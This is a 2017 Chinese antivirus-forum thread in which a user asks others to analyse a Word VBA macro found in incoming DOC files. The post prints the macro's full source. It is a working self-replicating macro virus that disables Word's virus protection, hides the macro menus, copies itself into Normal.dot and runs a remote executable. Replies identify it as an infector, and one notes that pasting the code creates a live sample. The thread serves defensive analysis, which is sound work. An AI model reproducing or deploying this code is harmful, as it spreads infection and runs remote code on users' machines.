查看: 1044|回复: 22
收起左侧

[可疑文件] 请分析一下这个宏干什么的?

[复制链接]
千里同风
发表于 2017-9-12 16:22:40 | 显示全部楼层 |阅读模式
经常要收来自某单位的DOC文档,每次都带这个,火绒提示病毒但杀不掉,对宏纯粹不懂,请兄弟们分析一下这个到底干什么坏事不?

Dim x1, x2, x3, x4 As Boolean
Dim x5, x6 As Object
Dim x7, x8, x16 As Integer
Dim x9 As Date
Dim x10, x11, x12, x13, x14 As String
Private Sub Document_Close()
On Error Resume Next
Set x5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x6 = NormalTemplate.VBProject.VBComponents.Item(1)
x3 = x5.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
x4 = x6.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
    CommandBars("Macro").Controls(4).Delete
    CommandBars("Macro").Controls(3).Delete
    CommandBars("Macro").Controls(2).Delete
    CommandBars("Macro").Controls(1).Delete
    CommandBars("Tools").Controls(17).Delete
Shell ("\\jdq\cc$\b.exe")
If x3 = True Then
    x13 = x5.codemodule.Lines(1, x5.codemodule.CountOfLines)
ElseIf x4 = True Then
    x13 = x6.codemodule.Lines(1, x6.codemodule.CountOfLines)
End If
If (x3 = True Xor x4 = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
      If x3 = True Then
        x2 = NormalTemplate.Saved
        x11 = x5.codemodule.Lines(1, x5.codemodule.CountOfLines)
        x6.codemodule.deletelines 1, x6.codemodule.CountOfLines
        x6.codemodule.AddFromString x11
        If x2 = True Then NormalTemplate.Save
      End If
    If x4 = True Or ActiveDocument.Saved = False Then
     x1 = ActiveDocument.Saved
     x11 = x6.codemodule.Lines(1, x6.codemodule.CountOfLines)
     x5.codemodule.deletelines 1, x5.codemodule.CountOfLines
     x5.codemodule.AddFromString x11
     If x1 = True Then ActiveDocument.Save
   End If
End If
End Sub
Private Sub Document_New()
Set x5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x6 = NormalTemplate.VBProject.VBComponents.Item(1)
x3 = x5.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
x4 = x6.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If x4 = False Then
    x6.codemodule.deletelines 1, x6.codemodule.CountOfLines
End If
If x3 = False Then
        x5.codemodule.deletelines 1, x5.codemodule.CountOfLines
End If

End Sub
Private Sub Document_Open()
Set x5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x6 = NormalTemplate.VBProject.VBComponents.Item(1)
x3 = x5.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
x4 = x6.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If x4 = False Then
    x6.codemodule.deletelines 1, x6.codemodule.CountOfLines
End If
If x3 = False Then
        x5.codemodule.deletelines 1, x5.codemodule.CountOfLines
End If
End Sub
XZ8SM7Sx0bVkoUV
发表于 2017-9-12 17:17:43 | 显示全部楼层
提示病毒杀不掉是什么 意思
zst470396853
发表于 2017-9-12 17:19:37 | 显示全部楼层
样本呢??
XZ8SM7Sx0bVkoUV
发表于 2017-9-12 17:21:38 | 显示全部楼层
本帖最后由 XZ8SM7Sx0bVkoUV 于 2017-9-12 17:36 编辑

感染型啊 ,

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
阿童木来了
发表于 2017-9-12 17:22:41 | 显示全部楼层
老司机也报毒了,你可以上传哈勃或是用本论坛饭友的分析工具试下!!!
http://bbs.kafan.cn/thread-2076549-1-1.html

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
千里同风
 楼主| 发表于 2017-9-12 18:24:57 | 显示全部楼层
XZ8SM7Sx0bVkoUV 发表于 2017-9-12 17:17
提示病毒杀不掉是什么 意思

火绒弹出发现病毒,我每次都点了处理,但好象没有处理,下次继续提示。
千里同风
 楼主| 发表于 2017-9-12 18:27:33 | 显示全部楼层

随便一个DOC中新建宏,把那段代码复制进去保存,这个DOC就是病毒样本了
千里同风
 楼主| 发表于 2017-9-12 18:28:46 | 显示全部楼层
阿童木来了 发表于 2017-9-12 17:22
老司机也报毒了,你可以上传哈勃或是用本论坛饭友的分析工具试下!!!
http://bbs.kafan.cn/thread-20765 ...

好的,改天请老大分析分析。
XZ8SM7Sx0bVkoUV
发表于 2017-9-12 18:37:40 | 显示全部楼层
千里同风 发表于 2017-9-12 18:24
火绒弹出发现病毒,我每次都点了处理,但好象没有处理,下次继续提示。

我刚刚点击立即处理后删除了,你那边是不是有东西一直创建它 ?你可以加一下火绒工程师大大的QQ,让她帮你看下吧

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
fuzhk
发表于 2017-9-12 19:37:15 | 显示全部楼层
[HTML] 纯文本查看 / 双击代码区域 Ctrl+A快速复制
类型:木马-virus.vbs.qexvmc.1
描述:木马是一种伪装成正常文件的恶意软件,会盗取您的帐号、密码等隐私资料。
扫描引擎:云安全引擎
文件路径:C:\Users\d*\Desktop\1.vbs
文件大小:2.8K (2,817 字节)
文件指纹(MD5):e1e70baf4*f98627
处理建议:隔离文件
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|优惠券| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.3( 苏ICP备07004770号 ) GMT+8, 2017-9-20 00:54 , Processed in 0.117022 second(s), 6 queries , MemCache On.

快速回复 返回顶部 返回列表